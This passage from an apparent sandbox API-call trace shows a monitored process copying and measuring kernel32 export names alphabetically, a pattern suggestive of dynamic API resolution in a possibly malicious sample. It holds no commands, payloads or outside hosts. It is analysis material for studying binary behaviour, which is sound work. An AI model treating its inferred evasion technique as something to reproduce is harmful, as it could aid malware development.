(lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.058] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.058] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.058] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.058] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.058] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.058] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.058] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.058] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.058] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.058] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.058] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.058] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.058] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.058] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.059] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.059] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.059] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.059] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.059] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.059] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.059] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.059] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.059] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.059] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.059] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.059] lstrlenA (lpString="BEEP") returned 4 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.059] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.059] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.059] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.059] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.059] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.059] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.059] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.060] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.060] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.060] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.060] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.060] lstrlenA (lpString="CANCELIO") returned 8 [0077.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.060] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.060] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.060] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.060] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.060] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.060] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.060] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.060] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.060] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.061] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.061] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.061] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.061] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.061] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.061] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.061] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.061] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.061] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.061] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.061] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.061] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.061] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.061] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.061] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.061] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.062] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.062] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.062] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.062] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.062] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.062] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.062] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.062] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.062] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.062] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.062] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.062] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.062] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.062] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.062] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.062] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.062] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.062] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.062] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.062] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.063] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.063] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.063] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.063] lstrlenA (lpString="COPYFILEA") returned 9 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.063] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.063] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.063] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.063] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.063] lstrlenA (lpString="COPYFILEW") returned 9 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.063] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.063] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.063] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.063] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.063] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.063] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.063] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.063] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.063] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.063] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.063] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.064] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.064] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.064] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.064] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.064] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.064] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.064] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.064] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.064] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.064] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.064] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.064] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.064] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.064] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.064] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.064] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.064] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.064] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.064] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.065] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.065] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.065] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.065] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.065] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.065] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.065] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") 